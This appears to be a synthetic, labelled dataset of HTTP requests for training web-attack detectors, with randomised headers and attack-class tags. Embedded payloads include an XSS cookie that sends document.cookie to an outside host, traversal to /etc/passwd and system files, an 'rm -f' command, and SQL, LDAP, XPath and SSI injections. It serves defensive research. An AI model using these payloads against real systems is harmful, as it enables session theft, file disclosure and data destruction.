UA-Disp: 6364,160,16
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 733x829
Via: 1.3 www.er6uPfa.jpg:191
Transfer-Encoding: compress
Upgrade: ihs/6.9, sw1v/7.0, tkg/8.2, rtlu/7.8, heTt/3.6
Warning: 682 9.47.244.88 "t7gglstsHoti" "Mon, 21 Jan 08 24:54:57 UTC"
X-Forwarded-For: 25.37.30.27
X-Serial-Number: 029543372781579317
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42487
Start - Id: 46677
class: XSS
GET /e_hx/r2qOBOWN7x0lMUiwg1sD/gxBxx9kqQyaj/ivDo/r9w8wocllaxe/UlA@Jq7/pa/nUX@JrxvqpK/bWShjG-3VHPhyR_mbeWQ/l08xatGdoag0/aD88Pfdb9J8dnWRLv9.css? HTTP/1.1
Host: 50.90.178.192:80
Connection: lTbea
Accept: video/quicktime, video/*
Accept-Charset: windows-1252
Accept-Encoding: identity, deflate;q=0.7
Accept-Language: nneeI-oAnR;q=0.5, rne5itys-o
Cache-Control: max-age=5
Client-ip: 122.1.27.92
Cookie: ee=<div    style ="    background-image:     url(javascript:   [document.location.replace    ('http://www.toasic.com/cgi-bin/laicla.cgi'+document.cookie);]);    "    >;rvogteo=rjzcC
Cookie2: $Version="94"
Date: Thu, 22 Nov 07 22:41:16 UTC
ETag: "LbLGWBdKI72rB3GO@"
Expect: 2Oine
From: ekionh@nouustph.biz
If-Modified-Since: Mon, 25 May 09 15:24:36 UTC
If-Unmodified-Since: Thu, 15 Feb 07 21:48:49 UTC
If-Match: *
If-None-Match: *
If-Range: "NlMTaOPuCi18rE5lem"
Max-Forwards: 1596
MIME-Version: 0.9
Pragma: no-cache
Proxy-Authorization: 5taRoo rnn5=c3tA9
Authorization: Basic ZUFvdDpvZWxlZGF1dA==
Range: 2194-5461,312-2895
Referer: http://ejhb3a.org/otYslst/oudivjEr.pl
TE: trailers,trailers,chunked
Trailer: If-Modified-Since
User-Agent: rt9O9RgSwG http://www.o2ca.biz
UA-CPU: x86
UA-Disp: 445,3184,32
UA-OS: Win98
UA-Color: color16
UA-Pixels: 630x4242
Via: HTTP/5.9 134.189.230.91, FTP/6.5 241.178.166.146
Transfer-Encoding: gzip
Upgrade: r6rtaz/7.2, e8A/7.2
Warning: 215 182.199.44.60 "ndteejhnqoKy4mea" "Sun, 18 Oct 09 09:17:52 UTC"
X-Forwarded-For: 36.143.183.170
X-Serial-Number: 49725305842038917
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46677
Start - Id: 45357
class: PathTransversal
PUT /a9sedamehdea06sxltdn/QB/34sam3uModOGSIjtG/wdxk.Y8/ietehh/n1dohwtM/DuDOh_/85ao_Em/rsooaacueycrau/ekcPrcjLCzHTH/tV/A1neaiafHtoHeeug.pl? HTTP/1.1
Content-Length: 209
Content-Language: o
Content-Encoding: compress
Content-Location: http://www.Qeel.gov/Ewoodsdl/teGadzaa/eepetsr.dll
Content-MD5: cHM4ck9kczZpc3lpbm53aQ==
Content-Type: application/x-www-form-urlencoded
Last-Modified: Sat, 15 Aug 09 23:51:11 UTC
Host: 22.55.23.158
Connection: close
Accept: */*
Accept-Charset: cp-950;q=0.4
Accept-Encoding: 
Accept-Language: rkajdl-getetrm;q=0.5, ya45-jns, tu-tac;q=0.6, 2bnt-HAto, tetMf-i4Fb;q=0.1
Cache-Control: no-cache
Client-ip: 195.135.237.8
Cookie: rchildketSM-_DX=8008
Cookie2: $Version="3"
Date: Sun, 27 Jun 04 12:50:12 UTC
ETag: "5FKhCbL9g@J-mEhNi3sB"
Expect: 100-continue
If-Modified-Since: Wed, 16 Dec 09 10:23:14 UTC
If-Unmodified-Since: Thu, 18 Feb 10 05:46:32 UTC
If-Match: *
If-None-Match: "W13Lr9PZLtNYx7nB81zj"
If-Range: Sat, 28 Nov 09 16:48:34 UTC
Max-Forwards: 3075
Pragma: cnIs=aryeu
Proxy-Authorization: NTLM OWl0bmdqbmhuZTZNbmllYnJUS1NlZTBvbW5yaXJvRWFpZ2VlaGUxZURzYWd4
Range: 9-,-793
Referer: /ci8eboe/yiCee.bin
TE: gzip;q=0.6,chunked;q=0.0,trailers
Trailer: If-Modified-Since
User-Agent: exs@9c0G http://www.doeanipe.com
UA-CPU: Sparc
UA-Disp: 8038,017,16
Via: 4tt/5.1 233.254.38.37:2703
Transfer-Encoding: identity
Warning: 500 www.csfpew.js "Upisof2goah" 
X-Forwarded-For: 42.158.87.228
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

iIpNi=wyMSBy6&vwztds=er&LL2OvDj=v5twZa+&y@9hV5inputm=qtt6fYbej0e&FTdXs=17361287&eerio2e4Merntof=/../../../../Inetpub/iissamples/revera/nadensvere/inalma/al.swf&brUlgs=w t&sa3euosnoiZEth=x

End - Id: 45357
Start - Id: 47564
class: XSS
GET /.X4zRA5/7vrWCpHJ0U7yFfBG/lOQzy4dUK1ORc7g8VxG/5o5/w-4IIb9phm/yncg/lACLp2hisMCbx/qU/h9.php3?tetkg6YssOQai=672932222&Iefh=%5BEt0dl%28perlda0diecho1li+tcr&8iiqaZa=5042&sH=+isC&ni=bevalopositionaatabinaahiL&on3=rrtsh8ihlh&ae=%3Cimg+++src++%3D++%22++rois++%3E%22++onmouseover%3D+++%22+%5Balert+%28%27eio%27%29%3B%5D+++++%22%3E&t1mytE2alerT=7 HTTP/1.0
Host: 138.201.114.159
Connection: close
Accept: image/*, image/gif;q=0.2, text/*;q=0.2
Accept-Charset: *
Accept-Encoding: 
Accept-Language: 0-aa, pTmeode-a, jssieh3-leidwFzc, s-t;q=0.4
Cache-Control: max-age=04615
Client-ip: 246.23.8.14
Cookie: ipaln=zeF75;etiiqSe4osjv=oi4;olspha2tHes=0dine
Cookie2: $Version="143"
Date: Thu, 11 Oct 07 11:24:45 GMT
ETag: W/"U8aHqItHXJkmtXoCz4YF"
Expect: 100-continue
From: ilyylhh@tttqt1htr.biz
If-Modified-Since: Sun, 02 Nov 08 16:41:41 CET
If-Unmodified-Since: Sat, 24 Mar 07 15:43:03 CET
If-Match: *
If-None-Match: *
If-Range: Wed, 23 May 07 03:52:07 CET
Max-Forwards: 8403
MIME-Version: 6.3
Pragma: de3fmbd=ls
Proxy-Authorization: Basic c0k4dG55OjJFbGFo
Authorization: Digest realm
Range: 946-214738,54330-8
Referer: http://www.eVlo.cz/ptne3c/sa5yoin/Ist9ao.msf
TE: trailers,trailers
Trailer: Accept-Language
User-Agent: Mozilla/0.6 (Windows; U; Win 9x 9.2; 0h-ea; rv:7.7.8) Gecko/59727021
UA-CPU: x86
UA-Disp: 2727,829,8
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 417x368
Via: FTP/3.8 www.adnn.html:386, 3.6 186.155.87.58, cDeH/9.9 74.177.179.0
Transfer-Encoding: deflate
Upgrade: nqne/3.2
Warning: 992 177.149.214.21:27 "ihta" 
X-Forwarded-For: 113.69.67.238
X-Serial-Number: 2524902769036083814
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47564
Start - Id: 46080
class: PathTransversal
POST /Bc/Useieetuarshotaaw/o3ddWHM/U.3o/r1RynWeXZHfNM359AKR@/ea1rzmahuhiaao.gif? HTTP/1.1
Content-Length: 89
Content-Language: R,abh,wnare
Content-Encoding: identity
Content-Location: /8tjued/9rur/1Y1oh/0rhescla.sh
Content-MD5: dGVhZGQ3dHVvdG5zbGVtaQ==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 25 Mar 04 15:44:43 CET
Last-Modified: Sat, 10 Jul 04 17:10:53 GMT
Host: 243.15.113.137
Connection: csnz
Accept: */*;q=0.5
Accept-Charset: *
Accept-Encoding: 
Accept-Language: ene-t;q=0.6, dhX-i3;q=0.3, n-bhnr, ae-fg;q=0.7
Cache-Control: max-age=7308
Client-ip: 135.238.113.4
Cookie: 83hsgteaiT=joconnect9 otareplacechsd;Idgsyehtc=fvIUOTiAwr;ep5n=tsroEkTwgetiselectkwIecpi
Cookie2: $Version="78"
Date: Wed, 09 Aug 06 21:46:45 GMT
Expect: etctA7v=4nygoels
If-Modified-Since: Thu, 11 Mar 10 01:31:14 CET
If-Unmodified-Since: Thu, 15 Sep 05 17:56:11 GMT
If-Match: *
If-None-Match: *
If-Range: Mon, 07 Feb 05 15:11:10 CET
Max-Forwards: 1154
MIME-Version: 4.9
Pragma: no-cache
Proxy-Authorization: NTLM bm9qb29xc2tyZXBudGVzdGNzeWVuOW1mYXlUbWFlZXJuZXNsaWVkNGJpYW5zY3Jz
Authorization: Digest username="teawnat"
Referer: /sgo2om/det9rue/sdnei.nsf
TE: gzip
User-Agent: io54crHeea
Via: FTP/2.2 149.96.97.72, 3.0 www.wyred.jpg, 9tg/4.6 www.neharoo.html
Transfer-Encoding: deflate
X-Forwarded-For: 169.44.253.54
X-Serial-Number: 3193493640489
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

uoyteai4KTs=idxhomestlrnEhod&sgo3BdeleteZ@wy=../../../../../../proc/version

End - Id: 46080
Start - Id: 49778
class: XPathInjection
GET /A1laiisinnd3si7etds/ha3sptl/fFg@iscriptc3GGimg/iot2o/nrOicpnq-KiECRJ/31MU/shutdown4Fc/fgEoZrmLoymD/T7osGtTcnnwa/mzoSqLdKO0PFSfQM/sVf5JNyF@ni9EW.jpeg?DFZwjVbgsoundCB2N=1%2Fltai%2FywE6it%2Fchild%3A%3Anode%28%29%5B+++position%28%29%3D11%5D+%7C++++Ded00r%2Fesyl%2Fxeyg%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D6%5D+or+%276uo%27++%3D++%27 HTTP/1.1
Host: www.cs4west.cz
Connection: keep-alive
Accept: */*;q=0.0
Accept-Charset: *;q=0.7
Accept-Encoding: *;q=0.2
Accept-Language: *
Cache-Control: no-store
Client-ip: 227.62.139.89
Cookie: oeoieonrmpEi=oiCdhleusrmfiphpboot.inien;3dz-435KV=r9aBntOjeirh;betA3=bodytuN;eOpucgdtaemit=dk~;Teegoieb=5142534
Cookie2: $Version="4"
Date: Tue, 20 Oct 09 06:21:47 UTC
ETag: "JQl-q5Ler@UUd1wq"
Expect: iedo=iysauhb
From: ue6tn@Rrbe5ijPo.uk
If-Modified-Since: Sun, 14 Jan 07 14:05:13 CET
If-Unmodified-Since: Sat, 10 Sep 05 09:40:17 GMT
If-Match: *
If-None-Match: *
If-Range: Wed, 04 Apr 07 22:13:39 CET
Max-Forwards: 8532
MIME-Version: 6.9
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: oehb ranln=fcmedrne
Range: -43159,7-
Referer: /jpesas7/4asc/mjofrh/ojewn.fgf
TE: trailers
Trailer: Connection
User-Agent: hraoEtdtmijmOeplow
UA-CPU: Sparc
UA-Disp: 7451,3171,32
UA-OS: Win95
UA-Color: color16
UA-Pixels: 3095x7377
Via: FTP/0.3 www.teygjyw.js
Transfer-Encoding: gzip
Upgrade: isn/7.4, skmojq/8.7, srajau/4.8, osil/1.0
Warning: 313 www.rnatjdd.tiff "ikOaheaoton2wee" "Wed, 13 May 09 04:48:39 UTC"
X-Forwarded-For: 242.32.16.78
X-Serial-Number: 5663252755
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 49778
Start - Id: 37902
class: LdapInjection
GET /ifrrsYtoeoMcm/axiepejlfyrdfldt/gnndcLjNews/serioeg5n0hat/nhuvKry9tNeeel/e3R2/qeNtwN/sd7fdeyadctprh/oRtiKe0xodU5U/tzGa8d4tP2B/tenu8.php?lest=saoop6&espwy=%29++%28+%7C+%28cn%3D*o++++%27brien*%29%28mail++%3D*o++%27brien*+++%29+++&t6nat=iGMu1&aeO=d%2F&Lwiorehtn=Kss&teEormnrsaan4ra=r%40i7tUlm&ysrert=updateytominetcatco%2F%2Bx+e&aw2oeonctscz=48be&nrzjaeslctddth=eah4aaipoen&tefWpldetsecn9e=spanOznlcseA&ee=connectrDmt&setucwEro=krjlTr+eoaDye&2nUtjpalmsru=0duf%5D&qi0nswnsarr6ts=ttxts HTTP/1.0
Host: www.lf2stjd.be:9
Connection: keep-alive
Accept: application/x-tar
Accept-Charset: windows-1255
Accept-Encoding: 
Accept-Language: *;q=0.2
Cache-Control: max-age=36386
Client-ip: 201.60.207.156
Cookie: eeitcyn7=eXiH
Cookie2: $Version="1"
Date: Sun, 29 Oct 06 02:40:06 CET
ETag: W/"k_eK26HPsis_XTtOs"
Expect: rtuj9fsi=tnild
From: pyeere9e@rgid7rnosp.be
If-Modified-Since: Fri, 04 Feb 05 05:47:15 CET
If-Unmodified-Since: Mon, 08 Nov 04 22:17:32 GMT
If-Match: *
If-None-Match: "KPyQYS3ZDOJzjYnPKR"
If-Range: "RMgMI-CTfjQkK3iPH"
Max-Forwards: 3754
MIME-Version: 1.5
Pragma: hthneo='r'
Proxy-Authorization: Digest realm
Authorization: viol wsolm=aeyhuO
Range: -004662,03-,-2001
Referer: http://www.9yd9DeeR.net/rweSii7.sh
TE: gzip
Trailer: User-Agent
User-Agent: l9cVI_OwLf http://www.wftnmn.org
UA-CPU: Sparc
UA-Disp: 472,2226,8
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 649x451
Via: 3.6 84.243.131.206:04
Transfer-Encoding: compress
Upgrade: 1tena/5.3
Warning: 778 www.sriAh.html "u4ef" 
X-Forwarded-For: 146.237.137.95
X-Serial-Number: 252435621932910
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37902
Start - Id: 39329
class: SSI
GET /YwddaEestumebysNdAr/kZhQ6/t9tesngrnhwi/nis3opnmxloC/VW_d39wgetZlDo5T/e1ryirtA/ia6sjGsfn/nohe9bsowiuAa/wpSWvTjHgfhpVu2r/eDmlotzadetooti/hbuofrwa/r8nrwmwer.js?ez7z=%3C%21--%23echo+var%3D%22date_gmt%22--%3E&6vcZqt7yJbodyq=1 HTTP/1.0
Host: www.euwrthr.net
Connection: keep-alive
Accept: */*;q=0.8
Accept-Charset: us-ascii
Accept-Encoding: identity;q=0.4, deflate, compress, compress;q=0.2, identity;q=0.4
Accept-Language: fionWeu-sh, a-tieuxac;q=0.4, 7a-s, eoutned-mlifowro, iNLem-liail
Cache-Control: min-fresh=63
Client-ip: 108.73.42.141
Cookie: odgoo=D1tfi;eeEn5xg2eSa=184788;ehr18=5869314189;rle= &Saoheh
Cookie2: $Version="998"
Date: Thu, 13 May 04 12:34:24 CET
ETag: "ahn213INlIBdLEkYKdGT"
Expect: 100-continue
From: fiaotu@eNeFi.it
If-Modified-Since: Sat, 06 Nov 04 01:33:26 UTC
If-Unmodified-Since: Fri, 08 Apr 05 01:09:42 GMT
If-Match: *
If-None-Match: *
If-Range: Fri, 19 Mar 10 23:09:39 CET
Max-Forwards: 891
MIME-Version: 5.7
Pragma: xa=eti7n8
Proxy-Authorization: NTLM dDF5cXlCY2FlcnMwZ3RveXJlbHQ4b0Vhc1R5cmhvaGFvaGU4c2Q=
Authorization: NTLM c2RBb3NidXRhNmFlVHJ3c2Vlc1V4aG1kZGV4cm9Fb2Vxcg==
Range: -7892
Referer: http://ehdqa.ch/ansgnehs.php4
TE: trailers,trailers
Trailer: From
User-Agent: m30uYwRd http://www.elsIhlgn.uk
UA-CPU: x86
UA-Disp: 593,4970,8
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 9132x248
Via: HTTP/6.0 123.127.180.111
Transfer-Encoding: deflate
Upgrade: hsyn/7.1
Warning: 603 www.gfjcoE2.gif "tntsi" "Thu, 02 Nov 06 09:59:58 UTC"
X-Forwarded-For: 135.206.207.129
X-Serial-Number: 802337450581
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39329
Start - Id: 46413
class: PathTransversal
GET /atyHs6tci/eT17767.YqEeStvUJh/uh12ler8ervhbolraonr/7kimwM/eL9ZvuG9H/h5anstobrmshh/ja8/ihzIzl4gUGwIKS/wp-q1q/a62367/oidc_lk/t9ZJLmY.cgi?nt=%5Clike0v%3Ad%2FS%25tnand&0fwsnuetys6enco=exele42ihb&lbaLcstl=550&htfrobtrehrp7=rfess&omtmBwHlixe=copyrt&i8=07&qyTweaea=434&tl8llesT5nr=ne&TusreUrb7wyB7K=%27an0i&ean=%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2Fetc%5C%2Fpasswd%2500.html&cs=z HTTP/1.0
Host: www.wnag1rbh.gov
Connection: close
Accept: */*;q=0.2
Accept-Charset: iso-8859-6
Accept-Encoding: gzip;q=0.3
Accept-Language: nlats-gcsvTmm;q=0.7, s-yeaNIotr;q=0.9
Cache-Control: max-age=81
Client-ip: 81.141.227.75
Cookie: PIDNconnectCOconnectXQ-=iGr3jM5;nowtphrhO=E3scznefdnk
Date: Mon, 30 Aug 04 16:51:35 CET
ETag: "7F80YTH_JJbucQ6@88o"
Expect: oAjaWneh
If-Unmodified-Since: Sun, 15 Apr 07 13:43:39 CET
If-Match: *
Max-Forwards: 926
MIME-Version: 6.7
Proxy-Authorization: Basic U25qbmY6aGhlZA==
Authorization: NTLM RWUxcnpzdHV1dnV0YnN0Ym5TZUVhbGVoZ3JlRWhwMmF0bjVzYmg=
Referer: http://www.dlx7t.ch/a97Icls.mspx
TE: chunked;q=0.1,trailers,trailers
User-Agent: 1asu (e_ihti7)
UA-CPU: PowerPC
Via: ajhaC/2.5 189.11.202.126, HTTP/7.0 116.120.155.56:538, 9.0 www.3reoel3.tiff
Transfer-Encoding: nyt8
Upgrade: hsrO0/6.6, nTafmr/5.2, s8am/7.7, sIshn/6.2
X-Forwarded-For: 80.80.233.157

null

End - Id: 46413
Start - Id: 36846
class: OsCommanding
PUT /ppelzy/9iv/oThtRweeha/aQkEy/ec6kZaCg3jq@m@/tLetAmX-7LY6kW/a3hg5/pEu7baIIOs5eercRdn/t9oinigNStyhlCh9oae/mvhE8rahegftes.exe? HTTP/1.1
Content-Length: 133
Content-Language: lfd,oio7kar0,es0q
Content-Encoding: compress
Content-MD5: ZXRwbHRpc2N0cmVkaWxzcw==
Content-Type: application/x-www-form-urlencoded
Last-Modified: Wed, 14 Jul 04 03:12:02 CET
Host: 78.137.221.238
Connection: wIGbW
Accept: */*;q=0.9
Accept-Charset: cp-950, hz-gb-2312;q=0.8, x-mac-roman;q=0.5, iso-8859-4, us-ascii;q=0.1
Accept-Encoding: *;q=0.3
Accept-Language: 7aUTi-zt;q=0.8
Cache-Control: no-transform
Client-ip: 35.73.137.190
Cookie: eyfimahitn=rm    -f    /tmp/e3taIc  |
Cookie2: $Version="9"
Date: Fri, 04 May 07 03:05:44 GMT
Expect: Oieyo=Eszeve;fseffojU=jserhma
If-None-Match: *
Max-Forwards: 961
MIME-Version: 1.6
Referer: http://neHl.fr/Rh4ss8he.php
User-Agent: Mozilla/1.4 (compatible; Konqueror/6.6; Win98; norhnuhn; Set2reHo)
UA-OS: Win9x
UA-Pixels: 281x368
Via: HTTP/4.4 156.103.212.72, 4.0 6.240.98.130
Transfer-Encoding: identity

swbveEb=7&aiSms=xtermtloglcand'7ytniwLYynexect&KpmN=urcTBxUSXpt5&oceaqucirckly=8273836310&Lartmoosiepbi=txne|aaiyh&isur=7etatdote

End - Id: 36846
Start - Id: 42145
class: SqlInjection
GET /eeekrtmi9rnuIaot/ase9OsbnOinod5oObkp/rp8jo03lPH_-p-KFW.css?9HhtesvmC9=u8ldocumentncselectgtand&aasdegef=citutph0iw8ezus&CecuyitN=eeeru&old=320%24&aerrmlashitdse=iicSinbo+%40vaoom&h76=gil&JdpNOkcOpasswd=-l&ats3a=95991641&DVX6d_TU=sqxs%40svlhqu&gnBobjectv1Zklz=oIaqopt&3iobsaecu8=++++OR+2++%3E+++1&swdpoRO6ioOeE=uEemhlvr&iOEMp-=rendeeUgtxd HTTP/1.0
Host: 237.181.67.2:80
Connection: close
Accept: application/postscript
Accept-Charset: *;q=0.1
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-cache
Client-ip: 117.221.83.105
Cookie: G8.cSn=50;KTWJU0=m
Cookie2: $Version="903"
Date: Wed, 23 Jun 04 02:04:27 CET
ETag: "Y-kpqEtfEwcQg2fs"
Expect: 2tic
From: yaieolw@dAieet.st
If-Modified-Since: Thu, 16 Jun 05 06:24:24 UTC
If-Unmodified-Since: Sat, 14 Jun 08 19:57:10 CET
If-Match: *
If-None-Match: "8NqXtTm@LnpvLXRAm"
If-Range: *
Max-Forwards: 0
MIME-Version: 0.7
Pragma: 2ac='PNt'
Proxy-Authorization: Digest response="EDaFEE464Cd220549436Ba0ec5F670E1"
Authorization: Digest realm
Range: 4781-
Referer: /chns/Ya4tameu/7rfrucp/ayr8ew/Ttenor.php4
TE: deflate,trailers
Trailer: Authorization
User-Agent: y3g3ncdsna/4.3.9.6
UA-CPU: StrongARM
UA-Disp: 2259,521,32
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 929x052
Via: 6.9 178.93.157.42, FTP/4.6 254.106.202.20
Transfer-Encoding: qrHi; 0edyoio=oiil
Upgrade: 9lrrsw/6.5, henvno/5.4
Warning: 795 www.ocntp.jpg "satrsjzkse" "Sat, 22 Aug 09 08:49:22 CET"
X-Forwarded-For: 229.231.134.44
X-Serial-Number: 45705
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42145
Start - Id: 42526
class: SqlInjection
GET /finsHf/b1Fw4/usr/siila9mesaI9eibfl7u/xauhtafentet/olebd/taj8dHCXo.css?iiat=9x%40omPZ&WhktndectA=%27++++%29+++UNION+ALL+++++SELECT+idA7++FROM++++7leDwa2+WHERE++%28+%27%27++++%3D+%27&dnEmrmnc=8150529527&teO6ehwlse=bsoornph-y%7E&epoNdqE=tsncrwytaljrdic%40ep HTTP/1.0
Host: www.2eeianP.fr
Connection: Algle
Accept: application/*, audio/x-wav
Accept-Charset: *;q=0.6
Accept-Encoding: *;q=0.5
Accept-Language: *;q=0.2
Cache-Control: no-transform
Client-ip: 193.221.217.71
Cookie: nhtstaiEtrsalai=sWDx;rylepeena0wt=2034;Ghortbs=e2R
Cookie2: $Version="62"
Date: Tue, 12 Aug 08 18:42:21 GMT
ETag: W/"bdccCy6uK1YsnZ3Ajlk0"
Expect: 100-continue
From: lwelhoow@zyxm39yja.net
If-Modified-Since: Sun, 18 Jun 06 17:49:09 GMT
If-Unmodified-Since: Tue, 12 Aug 08 12:08:03 CET
If-Match: "lkGyeulRSnjTR6Yc"
If-None-Match: *
If-Range: *
Max-Forwards: 69
MIME-Version: 4.3
Pragma: iecz2e='0wjtuijG'
Proxy-Authorization: NTLM NXRXZGh0ZW81bXNzbm1nYXhudm1UZGR0aWFhZmVmcGV0c2FuZWVLZXJlcnM=
Authorization: naiao P9E9e=cekn
Range: 2-
Referer: http://ask1.org/Jelet/bhhie/rnDhn/ehxemnn.cgi
TE: trailers
Trailer: Via
User-Agent: Mozilla/5.4 (Machintosh; U; PPC Mac OS X 6.6; 1h-ee; rv:7.6.6) Gecko/55579956
UA-CPU: x86
UA-Disp: 3013,748,32
UA-OS: Win95
UA-Color: color32
UA-Pixels: 8264x986
Via: riEn3/0.7 92.24.213.228, kFa/5.6 www.plsaese.js, 0.8 www.gn0enu.png
Transfer-Encoding: deflate
Upgrade: hdxl/4.1, ir1i9/2.4
Warning: 039 www.rscr.js "tEodeseiset5e5eLbAid" 
X-Forwarded-For: 10.31.99.179
X-Serial-Number: 49861
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42526
Start - Id: 37444
class: LdapInjection
GET /tokf16Orielas.jpg?12null9Z=i+&una3jfasfenron=uoshupdate%7E4gc&ors=+huehESew0acr HTTP/1.0
Host: 100.252.121.219:2011
Connection: close
Accept: text/*, video/*, audio/*;q=0.1
Accept-Charset: *
Accept-Encoding: compress, gzip;q=0.8, compress;q=0.2
Accept-Language: *;q=0.2
Cache-Control: min-fresh=9
Client-ip: 2.123.215.39
Cookie: CrqQ3jhtpassvxs3sock_stream=boot.inirNidE2Osc;gh4vrssueNfn=iLz@lpsuz;nisiatgAadd3d4=61191;0KN-5_sT=7301522;tXXpeW.Vw=s-wEP7CGFpF;6etta8h=2143)(&(objectClass=In3s)(|(sn  = C0ho)(cn=d85x    J*))
Cookie2: $Version="457"
Date: Sat, 29 Aug 09 15:05:35 CET
ETag: W/"d270caUDksMd6oQ"
Expect: 100-continue
From: k7ssi@mAb8.it
If-Modified-Since: Wed, 27 Aug 08 12:48:47 UTC
If-Unmodified-Since: Fri, 26 Mar 10 07:45:12 UTC
If-Match: "85zxJMQzn5D8uh@K"
If-None-Match: *
If-Range: *
Max-Forwards: 02
MIME-Version: 6.4
Pragma: e7picp=e29t3ao
Proxy-Authorization: Basic eTdvYXVQdDo2eTNpbw==
Authorization: Basic aUEya3NUczp1eGh0ZQ==
Range: 7819-5,-1484,-56914
Referer: http://www.egz0q6r.fr/ttaaedp/treo/Yaooxeu/eoIgy/tnnNa.doc
TE: gzip
Trailer: Accept-Language
User-Agent: lpleln/2.1.1.3.4
UA-Disp: 3647,135,16
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 3721x5671
Via: 8.4 www.7a2me5ln.jpeg:9, 7.6 www.eesaa.shtml, FTP/5.9 60.180.203.52:22
Transfer-Encoding: gzip
Upgrade: mairai/9.8
Warning: 180 www.nsifnOg.htm "oAiorsoesutLo4kysE" "Tue, 10 Feb 09 15:37:26 UTC"
X-Forwarded-For: 188.52.154.151
X-Serial-Number: 9320114880
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 37444
Start - Id: 48561
class: XPathInjection
POST /tf/tqoemecsxhcgog9e/1qCVm0l1LUUst/ttelseoT/lftFrelEbyih/akMI2EzmUw.biW9mYAnn/iordyaIho97i2/wB034Gh1146e4r/bmAp8sc1Ga2f@d/ua-p/rapyjbi.aspx? HTTP/1.0
Content-Length: 224
Content-Language: Eety,e,9nntnaSd
Content-Encoding: deflate
Content-Location: http://eiegs.org/prrgw/ueena4.sh
Content-MD5: dGUxZEhhaG9hc2hodWViaQ==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 09 Oct 08 18:11:54 UTC
Last-Modified: Wed, 17 Feb 10 22:50:34 UTC
Host: www.adiayroeb.net:896
Connection: hblcEysn
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.7
Cache-Control: only-if-cached
Client-ip: 174.93.187.45
Cookie: uipp=368043
Cookie2: $Version="8"
Date: Wed, 07 Oct 09 15:05:25 UTC
ETag: W/".NpEoPMJ922d-Z-plN"
Expect: olaslnwd=eMwneuh;iodg7=mroae
From: w3nw@eoeld2.be
If-Modified-Since: Thu, 03 Dec 09 06:23:25 CET
If-Unmodified-Since: Wed, 07 May 08 19:34:48 GMT
If-Match: "Z6c43SIzfP2qH58GinIm"
If-None-Match: *
If-Range: Mon, 26 Jan 04 02:24:41 UTC
Max-Forwards: 1165
MIME-Version: 8.7
Pragma: no-cache
Proxy-Authorization: siue bdclebse=ssaui
Authorization: asie1h iuluas=skrk7lw
Range: 25-032
Referer: http://8Leh.it/dNyn/o26aswrs.sh
TE: chunked;q=0.7
Trailer: Authorization
User-Agent: Mozilla/3.7 (X11; U; Unix 9.9; wt-de; rv:4.7.6) Gecko/56405072
UA-CPU: StrongARM
UA-Disp: 488,4156,8
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 0026x0337
Via: xrsrn/5.6 200.13.205.9
Transfer-Encoding: nhRze
Upgrade: tht3/1.7, Wquod/3.6, gppbhH/7.6, oiu/0.5
Warning: 651 www.filmtc.css "8HFtmshdumhqpyai" 
X-Forwarded-For: 60.213.229.203
X-Serial-Number: 63432598525498098
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

rnU8WyRGD=eacethkb&8mywohjou=t1oREyA]\s0di&5Tenmu=88470&upaoQY=0946346485&eteda=62387    or     1<     tce1e/eo/ta/child::text()[position()=365]    or  8='] | /* | /foo[bar='

End - Id: 48561
Start - Id: 46393
class: PathTransversal
GET /5zJxAL/hr7et/jtULgrqSec/dL6a4/d4i9tRyt0aWmC/rEEf8fC./oVHI_deAAFo6ea/teNp/rtinDuh/rL9km.css?mno1tlhsT=Mphp%2Fhtlink%7Conera%5Dtwp-d&8el7pidacy=tasbcaSnetnINv&Hasea7a=27496247&EAlneoyrwgipee=..%2F..%2F..%2F..%2Fvar%2Flog%2Faccess_log%2500.html&tweltaeMho=reum0nE&Et_tZIpz=imetaOhda8ftp&llaepuuowtnjmz=bo&tnMeiat=a+i&ehemi3diewslsnp=5854&ellypd=2798&dficsrwenNweh=3a4t%24kIima9samkC0&eihbtrwfh=68&ilheoeiaOlsiRm=88&ef=tmpga&ttb9lwfcA4=divs HTTP/1.0
Host: 51.56.155.84
Connection: keep-alive
Accept: video/*;q=0.3, audio/*;q=0.2, text/*
Accept-Charset: *;q=0.4
Accept-Encoding: 
Accept-Language: ntba-htHs, ninana-mOnnk, tt-b
Cache-Control: no-store
Client-ip: 23.79.216.68
Cookie: sliseeja7giaewa=Ted;95NVnL0NfV6=a;i4fgs9Som1pmya=edAn;nAhreskni=m5R7v;GcxD=c ;pIitSaU=nzrp
Cookie2: $Version="7"
Date: Sun, 07 Sep 08 07:21:40 CET
